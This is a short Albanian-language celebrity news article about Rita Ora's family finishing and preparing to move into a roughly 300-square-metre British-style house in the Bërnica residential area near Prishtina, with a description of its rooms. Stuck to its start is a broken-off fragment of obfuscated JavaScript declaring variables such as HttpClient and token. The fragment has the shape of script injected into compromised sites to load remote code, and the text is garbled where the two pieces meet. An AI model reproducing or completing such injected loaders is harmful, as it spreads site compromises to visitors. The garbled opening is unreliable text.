;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Mbarojnë punimet, familja Ora gati për t’u zhvendosur në shtëpinë e re në Bërnicë

By

Në fund të vitit 2018 familja Sahatçiu – Ora ‘goditi’ blerjen e shtëpisë më të re në Kosovë.

Ata vendosën që të kenë një adresë të përhershme në vendin e origjinës, për siç u shpreh nëna e këngëtares Rita Ora, Vera “që ne dhe gjeneratat e ardhshme të kemi mundësi ta vizitojmë qytetin tonë Prishtinën”.

Rreth dy vite e gjysmë pas, streha e re e familjes është gati.

Lajmin e ka konfirmuar faqja e lagjes luksoze rezidenciale në periferi të Prishtinës.

“Fqinjët shpesh nuk janë dikush që ju mund të zgjidhni. Familja ORA – Gati për t’u vendosur” – thuhet në njoftimin e kompanisë.

May be an image of 3 people, people standing, outdoors and text that says 'NEW NEIGHBORS MOVING IN SOON CHELSEA POINT BERNICA PARK'

Shtëpia e familjes Sahatçiu – Ora në Bërnicë tashmë e përfunduar, ka një sipërfaqe prej afro 300 metrave katrorë.

Adresa ku do të qëndrojnë gjatë pushimeve familja në katin përdhesë përfshim dhomën e qëndrimit me kuzhinë & tryezarinë, dyer françeze dyshe që të çojnë drejt kopshtit prapa.

Në katin e parë është dhoma e madhe e gjumit me dush en-suite dhe gardërobë, 2 dhoma gjumi dyshe, banjo të veçantë, bllok termo dhe akustiko izolues, dritare me efiçencë të lartë, xham të trefishtë.

Në tërësi është ndërtuar me stil dhe arkitekturë britanike duke bërë që njëkohësisht, ata të kenë edhe origjinën edhe Londrën në një vend! /Prive.al

Artikuj të ngjashëm